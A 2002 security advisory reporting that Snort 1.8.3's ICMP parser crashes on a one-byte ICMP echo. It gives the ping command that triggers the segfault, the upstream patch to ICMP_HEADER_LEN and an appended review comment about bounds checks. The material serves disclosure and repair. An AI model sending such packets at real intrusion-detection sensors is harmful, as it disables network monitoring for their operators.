Snort IDS is susceptible to DoS (maybe exploitable remote buffer overflow)
11th Jan 2002 [SBWID-4993]
COMMAND

	Snort IDS is susceptible to DoS (maybe exploitable remote buffer
	overflow)

SYSTEMS AFFECTED

	Snort 1.8.3 and probably earlier

PROBLEM

	Per the report by "Sinbad", the Snort ICMP parser is doomed ...
	

	Example:
	 

	 # snort -dev host 192.168.0.3 and 192.168.0.1 

	 

	 Ping 192.168.0.1 from 192.168.0.3 with one byte of data in the payload:

	 # ping -c 1 -s 1 192.168.0.1

	 

	 Snort's output is shown below:

	 -*> Snort! <*-

	 Version 1.8.3 (Build 88)

	 By Martin Roesch (roesch@sourcefire.com, www.snort.org)

	 01/10-11:34:43.898282 0:80:AD:78:83:BB -> 0:E0:18:C4:52:76 type:0x800 len:0x2B

	 192.168.0.3 -> 192.168.0.1 ICMP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:29 DF

	 Type:8  Code:0  ID:9435   Seq:0  ECHO

	 Segmentation fault (core dumped)

	

SOLUTION

	The following patch has been committed to the Snort 1.8 branch of Snort CVS
	and is included in build 90.
	

	

	--- olddecode.h Thu Jan 10 15:47:48 2002

	+++ decode.h    Thu Jan 10 12:15:33 2002

	@@ -105,7 +105,7 @@

	 #define IP_HEADER_LEN           20

	 #define TCP_HEADER_LEN          20

	 #define UDP_HEADER_LEN          8

	-#define ICMP_HEADER_LEN         8

	+#define ICMP_HEADER_LEN         4

	 

	 #define TH_FIN  0x01

	 #define TH_SYN  0x02
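
Review bot: the new value on the "+#define ICMP_HEADER_LEN 4" line carries no comment saying which fields those 4 bytes cover, and nothing in this hunk shows a length check against it. Suggest documenting next to the define that it now means only the common ICMP header (type, code, checksum), with type-specific fields such as the echo ID and Seq counted separately. The decoder code that uses this constant is not shown here, so it should be confirmed that every place that subtracts ICMP_HEADER_LEN or reads type-specific fields first verifies that enough captured bytes remain, so that a short datagram like the DgmLen:29 echo in the report cannot push a length calculation out of range. Any other code that relied on the old value of 8 should be audited as well, since it now computes a different offset.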

	
